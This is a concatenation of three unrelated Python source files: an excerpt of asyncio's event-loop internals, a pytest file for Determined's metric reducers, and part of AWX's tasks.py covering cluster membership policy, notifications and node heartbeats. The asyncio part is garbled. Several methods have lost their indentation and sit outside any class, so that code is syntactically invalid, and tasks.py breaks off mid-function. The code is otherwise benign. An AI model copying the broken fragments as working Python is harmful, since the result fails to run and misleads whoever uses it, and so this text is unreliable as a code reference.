        This default handler logs the error message and other
        context-dependent information. In debug mode, a truncated
        stack trace is also appended showing where the given object
        (e.g. a handle or future or task) was created, if any.
        The context parameter has the same meaning as in
        `call_exception_handler()`.
        """
        message = context.get('message')
        if not message:
            message = 'Unhandled exception in event loop'
        exception = context.get('exception')
        if exception is not None:
            # Full (type, value, traceback) triple for logger.error().
            exc_info = (type(exception), exception, exception.__traceback__)
        else:
            exc_info = False
        # In debug mode, attach where the currently-running handle was
        # created, unless the context already carries a source traceback.
        if ('source_traceback' not in context and
                self._current_handle is not None and
                self._current_handle._source_traceback):
            context['handle_traceback'] = \
                self._current_handle._source_traceback
        log_lines = [message]
        for key in sorted(context):
            if key in {'message', 'exception'}:
                continue
            value = context[key]
            if key == 'source_traceback':
                tb = ''.join(traceback.format_list(value))
                value = 'Object created at (most recent call last):\n'
                value += tb.rstrip()
            elif key == 'handle_traceback':
                tb = ''.join(traceback.format_list(value))
                value = 'Handle created at (most recent call last):\n'
                value += tb.rstrip()
            else:
                value = repr(value)
            log_lines.append(f'{key}: {value}')
        logger.error('\n'.join(log_lines), exc_info=exc_info)
    def call_exception_handler(self, context):
        """Call the current event loop's exception handler.
        The context argument is a dict containing the following keys:
        - 'message': Error message;
        - 'exception' (optional): Exception object;
        - 'future' (optional): Future instance;
        - 'task' (optional): Task instance;
        - 'handle' (optional): Handle instance;
        - 'protocol' (optional): Protocol instance;
        - 'transport' (optional): Transport instance;
        - 'socket' (optional): Socket instance;
        - 'asyncgen' (optional): Asynchronous generator that caused
          the exception.
        New keys maybe introduced in the future.
        Note: do not overload this method in an event loop subclass.
        For custom exception handling, use the
        `set_exception_handler()` method.
        """
        if self._exception_handler is None:
            try:
                self.default_exception_handler(context)
            except (SystemExit, KeyboardInterrupt):
                raise
            except BaseException:
                # Second protection layer for unexpected errors
                # in the default implementation, as well as for subclassed
                # event loops with overloaded "default_exception_handler".
                logger.error('Exception in default exception handler',
                             exc_info=True)
        else:
            try:
                self._exception_handler(self, context)
            except (SystemExit, KeyboardInterrupt):
                raise
            except BaseException as exc:
                # Exception in the user set custom exception handler.
                try:
                    # Let's try default handler.
                    self.default_exception_handler({
                        'message': 'Unhandled error in exception handler',
                        'exception': exc,
                        'context': context,
                    })
                except (SystemExit, KeyboardInterrupt):
                    raise
                except BaseException:
                    # Guard 'default_exception_handler' in case it is
                    # overloaded.
                    logger.error('Exception in default exception handler '
                                 'while handling an unexpected error '
                                 'in custom exception handler',
                                 exc_info=True)
def _add_callback(self, handle):
"""Add a Handle to _scheduled (TimerHandle) or _ready."""
assert isinstance(handle, events.Handle), 'A Handle is required here'
if handle._cancelled:
return
assert not isinstance(handle, events.TimerHandle)
self._ready.append(handle)
def _add_callback_signalsafe(self, handle):
    """Like _add_callback() but called from a signal handler."""
    self._add_callback(handle)
    # Wake up the selector so the newly queued callback runs promptly;
    # a signal may arrive while the loop is blocked in select().
    self._write_to_self()
def _timer_handle_cancelled(self, handle):
"""Notification that a TimerHandle has been cancelled."""
if handle._scheduled:
self._timer_cancelled_count += 1
def _run_once(self):
    """Run one full iteration of the event loop.

    This calls all currently ready callbacks, polls for I/O,
    schedules the resulting callbacks, and finally schedules
    'call_later' callbacks.
    """
    # Phase 1: purge cancelled timers.  If too large a fraction of the
    # heap is cancelled, rebuild the whole heap; otherwise just pop the
    # cancelled entries off the head.
    sched_count = len(self._scheduled)
    if (sched_count > _MIN_SCHEDULED_TIMER_HANDLES and
        self._timer_cancelled_count / sched_count >
            _MIN_CANCELLED_TIMER_HANDLES_FRACTION):
        # Remove delayed calls that were cancelled if their number
        # is too high
        new_scheduled = []
        for handle in self._scheduled:
            if handle._cancelled:
                handle._scheduled = False
            else:
                new_scheduled.append(handle)
        heapq.heapify(new_scheduled)
        self._scheduled = new_scheduled
        self._timer_cancelled_count = 0
    else:
        # Remove delayed calls that were cancelled from head of queue.
        while self._scheduled and self._scheduled[0]._cancelled:
            self._timer_cancelled_count -= 1
            handle = heapq.heappop(self._scheduled)
            handle._scheduled = False
    # Phase 2: poll for I/O.  Timeout is 0 (non-blocking) when there is
    # ready work or the loop is stopping; otherwise sleep until the
    # earliest timer, capped at MAXIMUM_SELECT_TIMEOUT.
    timeout = None
    if self._ready or self._stopping:
        timeout = 0
    elif self._scheduled:
        # Compute the desired timeout.
        when = self._scheduled[0]._when
        timeout = min(max(0, when - self.time()), MAXIMUM_SELECT_TIMEOUT)
    event_list = self._selector.select(timeout)
    self._process_events(event_list)
    # Handle 'later' callbacks that are ready.
    # Timers whose deadline falls within one clock resolution of "now"
    # are considered due.
    end_time = self.time() + self._clock_resolution
    while self._scheduled:
        handle = self._scheduled[0]
        if handle._when >= end_time:
            break
        handle = heapq.heappop(self._scheduled)
        handle._scheduled = False
        self._ready.append(handle)
    # This is the only place where callbacks are actually *called*.
    # All other places just add them to ready.
    # Note: We run all currently scheduled callbacks, but not any
    # callbacks scheduled by callbacks run this time around --
    # they will be run the next time (after another I/O poll).
    # Use an idiom that is thread-safe without using locks.
    ntodo = len(self._ready)
    for i in range(ntodo):
        handle = self._ready.popleft()
        if handle._cancelled:
            continue
        if self._debug:
            try:
                self._current_handle = handle
                t0 = self.time()
                handle._run()
                dt = self.time() - t0
                # In debug mode, warn about callbacks that hog the loop.
                if dt >= self.slow_callback_duration:
                    logger.warning('Executing %s took %.3f seconds',
                                   _format_handle(handle), dt)
            finally:
                self._current_handle = None
        else:
            handle._run()
    handle = None  # Needed to break cycles when an exception occurs.
def _set_coroutine_origin_tracking(self, enabled):
if bool(enabled) == bool(self._coroutine_origin_tracking_enabled):
return
if enabled:
self._coroutine_origin_tracking_saved_depth = (
sys.get_coroutine_origin_tracking_depth())
sys.set_coroutine_origin_tracking_depth(
constants.DEBUG_STACK_DEPTH)
else:
sys.set_coroutine_origin_tracking_depth(
self._coroutine_origin_tracking_saved_depth)
self._coroutine_origin_tracking_enabled = enabled
def get_debug(self):
    """Return True if the event loop is running in debug mode."""
    return self._debug
def set_debug(self, enabled):
    """Set the loop's debug mode.

    If the loop is already running, coroutine-origin tracking is
    synchronized from within the loop via call_soon_threadsafe.
    """
    self._debug = enabled
    if self.is_running():
        self.call_soon_threadsafe(
            self._set_coroutine_origin_tracking, enabled)
|
test_reducer.py | import itertools
import logging
import threading
import traceback
from collections import namedtuple
from typing import Any, Callable, List
import numpy as np
import pytest
from determined import _core
from determined.pytorch import Reducer, _PyTorchReducerContext, _simple_reduce_metrics
logger = logging.getLogger(__name__)
def test_reducer() -> None:
    """Unit-check each built-in Reducer over a fixed metric vector."""
    metrics = np.array([0.25, 0.5, 0.75, 1, 25.5, 1.9])
    assert np.around(_simple_reduce_metrics(Reducer.AVG, metrics), decimals=2) == 4.98
    assert _simple_reduce_metrics(Reducer.SUM, metrics) == 29.9
    assert _simple_reduce_metrics(Reducer.MIN, metrics) == 0.25
    assert _simple_reduce_metrics(Reducer.MAX, metrics) == 25.5
    # AVG again, this time weighted by per-process batch counts.
    batches_per_process = [1, 2, 5, 4, 5, 6]
    assert (
        np.around(_simple_reduce_metrics(Reducer.AVG, metrics, batches_per_process), decimals=2)
        == 6.43
    )
# Per-rank bundle used by test_custom_reducer_slot_order: the distributed
# context, its reducer context, and the wrapped custom reducer.
DummyDistributedReducerContext = namedtuple(
    "DummyDistributedReducerContext", "distributed_context reducer_context wrapped_reducer"
)
def dummy_reducer(values: List) -> Any:
    """Flatten a list of per-rank lists and return the flat values plus their sum."""
    logger.debug(f"reducing {values}")
    flattened = list(itertools.chain.from_iterable(values))
    return {"values": flattened, "sum": sum(flattened)}
@pytest.mark.parametrize("cross_size", [1, 3])
@pytest.mark.parametrize("local_size", [1, 3])
def test_custom_reducer_slot_order(cross_size: int, local_size: int) -> None:
    """End-to-end check that a custom reducer sees updates reassembled in rank order.

    Spawns one thread per (cross_rank, local_rank) pair, feeds each rank its
    shard of the dataset, reduces across ranks, and asserts the reduced
    values come back in the original dataset order.
    """
    size = cross_size * local_size
    dataset_size = 47

    def do_parallel(fn: Callable) -> List:
        """
        Run the same function on one-thread-per-rank, assert there were no exceptions, and return
        the results from each rank.
        """
        results = [None] * size  # type: List
        errors = [None] * size  # type: List
        threads = []
        for cross_rank, local_rank in itertools.product(range(cross_size), range(local_size)):
            rank = cross_rank * local_size + local_rank

            def _fn(rank: int, cross_rank: int, local_rank: int) -> None:
                try:
                    results[rank] = fn(rank, cross_rank, local_rank)
                except Exception:
                    errors[rank] = traceback.format_exc()
                    raise

            threads.append(threading.Thread(target=_fn, args=(rank, cross_rank, local_rank)))
        # encourage allgather to occur in not-the-correct order to test the reordering
        for thread in reversed(threads):
            thread.start()
        for thread in threads:
            thread.join()
        assert errors == [None] * size, "not all threads exited without error"
        return results

    def make_reducer_context(
        rank: int, cross_rank: int, local_rank: int
    ) -> DummyDistributedReducerContext:
        # Build one distributed + reducer context pair for this rank.
        distributed_context = _core.DistributedContext(
            rank=cross_rank * local_size + local_rank,
            size=cross_size * local_size,
            local_rank=local_rank,
            local_size=local_size,
            cross_rank=cross_rank,
            cross_size=cross_size,
            chief_ip="localhost",
            force_tcp=False,
        )
        reducer_context = _PyTorchReducerContext(distributed_context._zmq_allgather)
        # reducer_context.wrap_reducer(lambda x: x, "dummy")
        wrapped_reducer = reducer_context.wrap_reducer(dummy_reducer)
        return DummyDistributedReducerContext(distributed_context, reducer_context, wrapped_reducer)

    trials = do_parallel(make_reducer_context)

    def get_batch_list(
        rank: int, batch_size: int, num_workers: int, seq: List[int]
    ) -> List[List[int]]:
        # Shard `seq` into fixed-size batches and keep only this rank's share.
        total_batches = (len(seq) + (batch_size - 1)) // batch_size
        my_batch_indices = [i for i in range(total_batches) if i % num_workers == rank]
        all_batches = [
            seq[batch_size * k : min(batch_size * k + batch_size, len(seq))]
            for k in range(total_batches)
        ]
        return [b for i, b in enumerate(all_batches) if i in my_batch_indices]

    observations = list(range(dataset_size))
    for rank, trial in enumerate(trials):
        for batch in get_batch_list(rank, 2, len(trials), observations):
            trial.wrapped_reducer.update(batch)
    results = do_parallel(lambda rank, _, __: trials[rank].reducer_context.reduce_metrics(False))
    logger.debug(results)
    # Close all distributed contexts
    for trial in trials:
        trial.distributed_context.close()
    for i, result in enumerate(results):
        # Sum of 0..dataset_size-1, and values must be back in original order.
        assert result["sum"] == dataset_size * (dataset_size - 1) // 2
        assert all(
            i == v for i, v in enumerate(result["values"])
        ), f"result[{i}]={result} is not in original order"
|
tasks.py | # -*- coding: utf-8 -*-
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from collections import OrderedDict, namedtuple, deque
import errno
import functools
import importlib
import json
import logging
import os
import shutil
import stat
import tempfile
import time
import traceback
from distutils.dir_util import copy_tree
from distutils.version import LooseVersion as Version
import yaml
import fcntl
from pathlib import Path
from uuid import uuid4
import urllib.parse as urlparse
import socket
import threading
import concurrent.futures
from base64 import b64encode
import subprocess
import sys
# Django
from django.conf import settings
from django.db import transaction, DatabaseError, IntegrityError
from django.db.models.fields.related import ForeignKey
from django.utils.timezone import now
from django.utils.encoding import smart_str
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _, gettext_noop
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django_guid.middleware import GuidMiddleware
# Django-CRUM
from crum import impersonate
# GitPython
import git
from gitdb.exc import BadName as BadGitName
# Runner
import ansible_runner
# dateutil
from dateutil.parser import parse as parse_date
# AWX
from awx import __version__ as awx_application_version
from awx.main.constants import PRIVILEGE_ESCALATION_METHODS, STANDARD_INVENTORY_UPDATE_ENV, MINIMAL_EVENTS
from awx.main.access import access_registry
from awx.main.redact import UriCleaner
from awx.main.models import (
Schedule,
TowerScheduleState,
Instance,
InstanceGroup,
UnifiedJob,
Notification,
Inventory,
InventorySource,
SmartInventoryMembership,
Job,
AdHocCommand,
ProjectUpdate,
InventoryUpdate,
SystemJob,
JobEvent,
ProjectUpdateEvent,
InventoryUpdateEvent,
AdHocCommandEvent,
SystemJobEvent,
build_safe_env,
)
from awx.main.constants import ACTIVE_STATES
from awx.main.exceptions import AwxTaskError, PostRunError
from awx.main.queue import CallbackQueueDispatcher
from awx.main.dispatch.publish import task
from awx.main.dispatch import get_local_queuename, reaper
from awx.main.utils.common import (
update_scm_url,
ignore_inventory_computed_fields,
ignore_inventory_group_removal,
extract_ansible_vars,
schedule_task_manager,
get_awx_version,
deepmerge,
parse_yaml_or_json,
cleanup_new_process,
create_partition,
)
from awx.main.utils.execution_environments import get_default_pod_spec, CONTAINER_ROOT, to_container_path
from awx.main.utils.ansible import read_ansible_config
from awx.main.utils.external_logging import reconfigure_rsyslog
from awx.main.utils.safe_yaml import safe_dump, sanitize_jinja
from awx.main.utils.reload import stop_local_services
from awx.main.utils.pglock import advisory_lock
from awx.main.utils.handlers import SpecialInventoryHandler
from awx.main.utils.receptor import get_receptor_ctl, worker_info, get_conn_type, get_tls_client
from awx.main.consumers import emit_channel_notification
from awx.main import analytics
from awx.conf import settings_registry
from awx.conf.license import get_license
from awx.main.analytics.subsystem_metrics import Metrics
from rest_framework.exceptions import PermissionDenied
__all__ = [
'RunJob',
'RunSystemJob',
'RunProjectUpdate',
'RunInventoryUpdate',
'RunAdHocCommand',
'handle_work_error',
'handle_work_success',
'apply_cluster_membership_policies',
'update_inventory_computed_fields',
'update_host_smart_inventory_memberships',
'send_notifications',
'purge_old_stdout_files',
]
HIDDEN_PASSWORD = '**********'
OPENSSH_KEY_ERROR = u'''\
It looks like you're trying to use a private key in OpenSSH format, which \
isn't supported by the installed version of OpenSSH on this instance. \
Try upgrading OpenSSH or providing your private key in an different format. \
'''
logger = logging.getLogger('awx.main.tasks')
def dispatch_startup():
    """Run once when the task dispatcher process starts.

    Re-syncs schedule computed fields, applies cluster membership policies,
    performs an initial heartbeat (which registers this instance if it is
    missing from the database), resets subsystem metrics, and rewrites the
    rsyslog configuration from DB settings.
    """
    startup_logger = logging.getLogger('awx.main.tasks')
    startup_logger.debug("Syncing Schedules")
    for sch in Schedule.objects.all():
        try:
            sch.update_computed_fields()
        except Exception:
            logger.exception("Failed to rebuild schedule {}.".format(sch))
    #
    # When the dispatcher starts, if the instance cannot be found in the database,
    # automatically register it.  This is mostly useful for openshift-based
    # deployments where:
    #
    # 2 Instances come online
    # Instance B encounters a network blip, Instance A notices, and
    # deprovisions it
    # Instance B's connectivity is restored, the dispatcher starts, and it
    # re-registers itself
    #
    # In traditional container-less deployments, instances don't get
    # deprovisioned when they miss their heartbeat, so this code is mostly a
    # no-op.
    #
    apply_cluster_membership_policies()
    cluster_node_heartbeat()
    Metrics().clear_values()
    # Update Tower's rsyslog.conf file based on logging settings in the db
    reconfigure_rsyslog()
def inform_cluster_of_shutdown():
    """Mark this instance offline and reap its jobs on graceful shutdown."""
    try:
        instance = Instance.objects.get(hostname=settings.CLUSTER_HOST_ID)
        instance.mark_offline(update_last_seen=True, errors=_('Instance received normal shutdown signal'))
        try:
            reaper.reap(instance)
        except Exception:
            logger.exception('failed to reap jobs for {}'.format(instance.hostname))
        logger.warning('Normal shutdown signal for instance {}, removed self from capacity pool.'.format(instance.hostname))
    except Exception:
        logger.exception('Encountered problem with normal shutdown signal.')
@task(queue=get_local_queuename)
def apply_cluster_membership_policies():
    """Recompute instance-group membership from the configured policies.

    Applies, in order: explicit policy instance lists, per-group instance
    minimums, then percentage policies; finally writes any membership
    deltas to the database in one transaction.  Serialized cluster-wide
    via the 'cluster_policy_lock' advisory lock.
    """
    started_waiting = time.time()
    with advisory_lock('cluster_policy_lock', wait=True):
        lock_time = time.time() - started_waiting
        # Waiting > 1s for the lock is notable enough to log at info level.
        if lock_time > 1.0:
            to_log = logger.info
        else:
            to_log = logger.debug
        to_log('Waited {} seconds to obtain lock name: cluster_policy_lock'.format(lock_time))
        started_compute = time.time()
        all_instances = list(Instance.objects.order_by('id'))
        all_groups = list(InstanceGroup.objects.prefetch_related('instances'))
        total_instances = len(all_instances)
        actual_groups = []
        actual_instances = []
        # Working copies: Group tracks desired vs. prior membership;
        # Node tracks how many groups an instance has been placed into.
        Group = namedtuple('Group', ['obj', 'instances', 'prior_instances'])
        Node = namedtuple('Instance', ['obj', 'groups'])
        # Process policy instance list first, these will represent manually managed memberships
        instance_hostnames_map = {inst.hostname: inst for inst in all_instances}
        for ig in all_groups:
            group_actual = Group(obj=ig, instances=[], prior_instances=[instance.pk for instance in ig.instances.all()])  # obtained in prefetch
            for hostname in ig.policy_instance_list:
                if hostname not in instance_hostnames_map:
                    logger.info("Unknown instance {} in {} policy list".format(hostname, ig.name))
                    continue
                inst = instance_hostnames_map[hostname]
                group_actual.instances.append(inst.id)
                # NOTE: arguable behavior: policy-list-group is not added to
                # instance's group count for consideration in minimum-policy rules
            if group_actual.instances:
                logger.debug("Policy List, adding Instances {} to Group {}".format(group_actual.instances, ig.name))
            actual_groups.append(group_actual)
        # Process Instance minimum policies next, since it represents a concrete lower bound to the
        # number of instances to make available to instance groups
        actual_instances = [Node(obj=i, groups=[]) for i in all_instances if i.managed_by_policy]
        logger.debug("Total instances: {}, available for policy: {}".format(total_instances, len(actual_instances)))
        for g in sorted(actual_groups, key=lambda x: len(x.instances)):
            # Control-plane group only takes control nodes; all other groups
            # only take non-control (execution) nodes.
            exclude_type = 'execution' if g.obj.name == settings.DEFAULT_CONTROL_PLANE_QUEUE_NAME else 'control'
            policy_min_added = []
            for i in sorted(actual_instances, key=lambda x: len(x.groups)):
                if i.obj.node_type == exclude_type:
                    continue  # never place execution instances in controlplane group or control instances in other groups
                if len(g.instances) >= g.obj.policy_instance_minimum:
                    break
                if i.obj.id in g.instances:
                    # If the instance is already _in_ the group, it was
                    # applied earlier via the policy list
                    continue
                g.instances.append(i.obj.id)
                i.groups.append(g.obj.id)
                policy_min_added.append(i.obj.id)
            if policy_min_added:
                logger.debug("Policy minimum, adding Instances {} to Group {}".format(policy_min_added, g.obj.name))
        # Finally, process instance policy percentages
        for g in sorted(actual_groups, key=lambda x: len(x.instances)):
            exclude_type = 'execution' if g.obj.name == settings.DEFAULT_CONTROL_PLANE_QUEUE_NAME else 'control'
            candidate_pool_ct = len([i for i in actual_instances if i.obj.node_type != exclude_type])
            if not candidate_pool_ct:
                continue
            policy_per_added = []
            for i in sorted(actual_instances, key=lambda x: len(x.groups)):
                if i.obj.node_type == exclude_type:
                    continue
                if i.obj.id in g.instances:
                    # If the instance is already _in_ the group, it was
                    # applied earlier via a minimum policy or policy list
                    continue
                if 100 * float(len(g.instances)) / candidate_pool_ct >= g.obj.policy_instance_percentage:
                    break
                g.instances.append(i.obj.id)
                i.groups.append(g.obj.id)
                policy_per_added.append(i.obj.id)
            if policy_per_added:
                logger.debug("Policy percentage, adding Instances {} to Group {}".format(policy_per_added, g.obj.name))
        # Determine if any changes need to be made
        needs_change = False
        for g in actual_groups:
            if set(g.instances) != set(g.prior_instances):
                needs_change = True
                break
        if not needs_change:
            logger.debug('Cluster policy no-op finished in {} seconds'.format(time.time() - started_compute))
            return
        # On a differential basis, apply instances to groups
        with transaction.atomic():
            for g in actual_groups:
                if g.obj.is_container_group:
                    logger.debug('Skipping containerized group {} for policy calculation'.format(g.obj.name))
                    continue
                instances_to_add = set(g.instances) - set(g.prior_instances)
                instances_to_remove = set(g.prior_instances) - set(g.instances)
                if instances_to_add:
                    logger.debug('Adding instances {} to group {}'.format(list(instances_to_add), g.obj.name))
                    g.obj.instances.add(*instances_to_add)
                if instances_to_remove:
                    logger.debug('Removing instances {} from group {}'.format(list(instances_to_remove), g.obj.name))
                    g.obj.instances.remove(*instances_to_remove)
        logger.debug('Cluster policy computation finished in {} seconds'.format(time.time() - started_compute))
@task(queue='tower_broadcast_all')
def handle_setting_changes(setting_keys):
    """Flush cached copies of changed settings (and their dependents) cluster-wide."""
    # Expand only the originally-changed keys (one level) with any settings
    # the registry reports as depending on them; iterate over a snapshot so
    # the appends do not feed back into the loop.
    for key in list(setting_keys):
        setting_keys.extend(settings_registry.get_dependent_settings(key))
    cache_keys = set(setting_keys)
    logger.debug('cache delete_many(%r)', cache_keys)
    cache.delete_many(cache_keys)
    # Log aggregator settings also require an rsyslog reconfiguration.
    if any(setting.startswith('LOG_AGGREGATOR') for setting in setting_keys):
        reconfigure_rsyslog()
@task(queue='tower_broadcast_all')
def delete_project_files(project_path):
    """Best-effort removal of a project checkout and its companion lock file."""
    # TODO: possibly implement some retry logic
    targets = (
        (project_path, shutil.rmtree,
         'Success removing project files {}', 'Could not remove project directory {}'),
        (project_path + '.lock', os.remove,
         'Success removing {}', 'Could not remove lock file {}'),
    )
    for path, remover, success_msg, failure_msg in targets:
        if os.path.exists(path):
            try:
                remover(path)
                logger.debug(success_msg.format(path))
            except Exception:
                logger.exception(failure_msg.format(path))
@task(queue='tower_broadcast_all')
def profile_sql(threshold=1, minutes=1):
    """Enable SQL profiling for *minutes* via a cache flag; threshold <= 0 disables it."""
    if threshold > 0:
        # The cache TTL bounds how long profiling stays on.
        cache.set('awx-profile-sql-threshold', threshold, timeout=minutes * 60)
        logger.error('SQL QUERIES >={}s ENABLED FOR {} MINUTE(S)'.format(threshold, minutes))
    else:
        cache.delete('awx-profile-sql-threshold')
        logger.error('SQL PROFILING DISABLED')
@task(queue=get_local_queuename)
def send_notifications(notification_list, job_id=None):
    """Send each Notification in *notification_list*, recording per-notification status.

    :param notification_list: list of Notification primary keys to send.
    :param job_id: optional UnifiedJob pk; when given, the notifications are
        associated with that job and a lifecycle event is logged per success.
    :raises TypeError: if notification_list is not a list.
    """
    if not isinstance(notification_list, list):
        raise TypeError("notification_list should be of type list")
    if job_id is not None:
        job_actual = UnifiedJob.objects.get(id=job_id)
    notifications = Notification.objects.filter(id__in=notification_list)
    if job_id is not None:
        job_actual.notifications.add(*notifications)
    for notification in notifications:
        update_fields = ['status', 'notifications_sent']
        try:
            sent = notification.notification_template.send(notification.subject, notification.body)
            notification.status = "successful"
            notification.notifications_sent = sent
            if job_id is not None:
                job_actual.log_lifecycle("notifications_sent")
        except Exception as e:
            logger.exception("Send Notification Failed {}".format(e))
            notification.status = "failed"
            notification.error = smart_str(e)
            update_fields.append('error')
        finally:
            # Persist whatever state was reached, even if sending raised.
            try:
                notification.save(update_fields=update_fields)
            except Exception:
                logger.exception('Error saving notification {} result.'.format(notification.id))
@task(queue=get_local_queuename)
def gather_analytics():
    """Ship automation analytics when the configured gather interval has elapsed."""
    from awx.conf.models import Setting
    from rest_framework.fields import DateTimeField

    last_gather = Setting.objects.filter(key='AUTOMATION_ANALYTICS_LAST_GATHER').first()
    last_time = None
    if last_gather and last_gather.value:
        last_time = DateTimeField().to_internal_value(last_gather.value)
    gather_time = now()
    interval_elapsed = (
        last_time is None or (gather_time - last_time).total_seconds() > settings.AUTOMATION_ANALYTICS_GATHER_INTERVAL
    )
    if interval_elapsed:
        analytics.gather()
@task(queue=get_local_queuename)
def purge_old_stdout_files():
    """Delete job stdout files older than LOCAL_STDOUT_EXPIRE_TIME."""
    cutoff = time.time() - settings.LOCAL_STDOUT_EXPIRE_TIME
    for name in os.listdir(settings.JOBOUTPUT_ROOT):
        path = os.path.join(settings.JOBOUTPUT_ROOT, name)
        if os.path.getctime(path) < cutoff:
            os.unlink(path)
            logger.debug("Removing {}".format(path))
@task(queue=get_local_queuename)
def cleanup_execution_environment_images():
    """Remove dangling podman images on non-k8s nodes."""
    if settings.IS_K8S:
        return
    listing = subprocess.run('podman images --filter="dangling=true" --format json'.split(" "), capture_output=True)
    if listing.returncode != 0:
        logger.debug("Cleanup execution environment images: could not get list of images")
        return
    if not listing.stdout:
        return
    for entry in json.loads(listing.stdout):
        image_name = entry["Id"]
        logger.debug(f"Cleanup execution environment images: deleting {image_name}")
        removal = subprocess.run(['podman', 'rmi', image_name, '-f'], stdout=subprocess.DEVNULL)
        if removal.returncode != 0:
            logger.debug(f"Failed to delete image {image_name}")
@task(queue=get_local_queuename)
def cluster_node_health_check(node):
    """Refresh this control node's health data.

    Backs the health check endpoint; it only makes sense when dispatched to
    the target node itself, so mismatched or blank hostnames are rejected.
    """
    if node == '':
        logger.warn('Local health check incorrectly called with blank string')
        return
    if node != settings.CLUSTER_HOST_ID:
        logger.warn(f'Local health check for {node} incorrectly sent to {settings.CLUSTER_HOST_ID}')
        return
    try:
        this_inst = Instance.objects.me()
    except Instance.DoesNotExist:
        logger.warn(f'Instance record for {node} missing, could not check capacity.')
        return
    this_inst.local_health_check()
@task(queue=get_local_queuename)
def execution_node_health_check(node):
    """Probe execution node *node* over receptor and persist its health data.

    :param node: hostname of an execution-type Instance.
    :returns: the raw worker_info dict, or None when the node is blank/unknown.
    :raises RuntimeError: if the named instance is not an execution node.
    """
    if node == '':
        logger.warn('Remote health check incorrectly called with blank string')
        return
    try:
        instance = Instance.objects.get(hostname=node)
    except Instance.DoesNotExist:
        logger.warn(f'Instance record for {node} missing, could not check capacity.')
        return
    if instance.node_type != 'execution':
        raise RuntimeError(f'Execution node health check ran against {instance.node_type} node {instance.hostname}')
    data = worker_info(node, work_type='ansible-runner' if instance.node_type == 'execution' else 'local')
    # Capacity before the check — used below to tell "newly lost" from
    # "never had capacity" when errors come back.
    prior_capacity = instance.capacity
    instance.save_health_data(
        version='ansible-runner-' + data.get('runner_version', '???'),
        cpu=data.get('cpu_count', 0),
        memory=data.get('mem_in_bytes', 0),
        uuid=data.get('uuid'),
        errors='\n'.join(data.get('errors', [])),
    )
    if data['errors']:
        formatted_error = "\n".join(data["errors"])
        if prior_capacity:
            logger.warn(f'Health check marking execution node {node} as lost, errors:\n{formatted_error}')
        else:
            logger.info(f'Failed to find capacity of new or lost execution node {node}, errors:\n{formatted_error}')
    else:
        logger.info('Set capacity of execution node {} to {}, worker info data:\n{}'.format(node, instance.capacity, json.dumps(data, indent=2)))
    return data
def inspect_execution_nodes(instance_list):
    """Reconcile receptor mesh advertisements against known execution Instances.

    For each node advertising the 'ansible-runner' work type: update its
    last_seen timestamp, optionally auto-register unknown nodes, and trigger
    health checks for new, rejoining, or errored nodes.  Serialized via the
    'inspect_execution_nodes_lock' advisory lock (no-op if already held).

    :param instance_list: Instance rows already fetched by the caller.
    """
    with advisory_lock('inspect_execution_nodes_lock', wait=False):
        node_lookup = {}
        for inst in instance_list:
            if inst.node_type == 'execution':
                node_lookup[inst.hostname] = inst
        ctl = get_receptor_ctl()
        connections = ctl.simple_command('status')['Advertisements']
        nowtime = now()
        for ad in connections:
            hostname = ad['NodeID']
            commands = ad.get('WorkCommands') or []
            if 'ansible-runner' not in commands:
                continue
            changed = False
            if hostname in node_lookup:
                instance = node_lookup[hostname]
            elif settings.MESH_AUTODISCOVERY_ENABLED:
                defaults = dict(enabled=False)
                (changed, instance) = Instance.objects.register(hostname=hostname, node_type='execution', defaults=defaults)
                logger.warning(f"Registered execution node '{hostname}' (marked disabled by default)")
            else:
                logger.warning(f"Unrecognized node on mesh advertising ansible-runner work type: {hostname}")
                # BUG FIX: without this continue, `instance` would be unbound on
                # the first iteration (NameError) or left over from a previous
                # advertisement, and the stale instance would be processed below.
                continue
            was_lost = instance.is_lost(ref_time=nowtime)
            last_seen = parse_date(ad['Time'])
            # Advertisements can arrive out of order; never move last_seen backwards.
            if instance.last_seen and instance.last_seen >= last_seen:
                continue
            instance.last_seen = last_seen
            instance.save(update_fields=['last_seen'])
            if changed:
                # Newly registered node: establish its capacity/version.
                execution_node_health_check.apply_async([hostname])
            elif was_lost:
                # if the instance *was* lost, but has appeared again,
                # attempt to re-establish the initial capacity and version
                # check
                logger.warning(f'Execution node attempting to rejoin as instance {hostname}.')
                execution_node_health_check.apply_async([hostname])
            elif instance.capacity == 0:
                # nodes with proven connection but need remediation run health checks are reduced frequency
                if not instance.last_health_check or (nowtime - instance.last_health_check).total_seconds() >= settings.EXECUTION_NODE_REMEDIATION_CHECKS:
                    # Periodically re-run the health check of errored nodes, in case someone fixed it
                    # TODO: perhaps decrease the frequency of these checks
                    logger.debug(f'Restarting health check for execution node {hostname} with known errors.')
                    execution_node_health_check.apply_async([hostname])
@task(queue=get_local_queuename)
def cluster_node_heartbeat():
    """Periodic heartbeat for this control node.

    Refreshes local health data, inspects receptor execution nodes, shuts
    this node down if a peer runs a newer version, and reaps/deprovisions
    peers whose heartbeats have lapsed.
    """
    logger.debug("Cluster node heartbeat task.")
    nowtime = now()
    instance_list = list(Instance.objects.all())
    this_inst = None
    lost_instances = []
    # Separate out our own Instance row; the for/else registers us if missing.
    for inst in instance_list:
        if inst.hostname == settings.CLUSTER_HOST_ID:
            this_inst = inst
            instance_list.remove(inst)
            break
    else:
        (changed, this_inst) = Instance.objects.get_or_register()
        if changed:
            logger.info("Registered tower control node '{}'".format(this_inst.hostname))
    inspect_execution_nodes(instance_list)
    # Collect peers whose last heartbeat is too old.
    for inst in list(instance_list):
        if inst.is_lost(ref_time=nowtime):
            lost_instances.append(inst)
            instance_list.remove(inst)
    if this_inst:
        startup_event = this_inst.is_lost(ref_time=nowtime)
        this_inst.local_health_check()
        if startup_event and this_inst.capacity != 0:
            # We ourselves were considered lost and just came back; skip the
            # peer-reaping below on this first heartbeat.
            logger.warning('Rejoining the cluster as instance {}.'.format(this_inst.hostname))
            return
    else:
        raise RuntimeError("Cluster Host Not Found: {}".format(settings.CLUSTER_HOST_ID))
    # IFF any node has a greater version than we do, then we'll shutdown services
    for other_inst in instance_list:
        if other_inst.version == "" or other_inst.version.startswith('ansible-runner') or other_inst.node_type == 'execution':
            continue
        if Version(other_inst.version.split('-', 1)[0]) > Version(awx_application_version.split('-', 1)[0]) and not settings.DEBUG:
            logger.error(
                "Host {} reports version {}, but this node {} is at {}, shutting down".format(
                    other_inst.hostname, other_inst.version, this_inst.hostname, this_inst.version
                )
            )
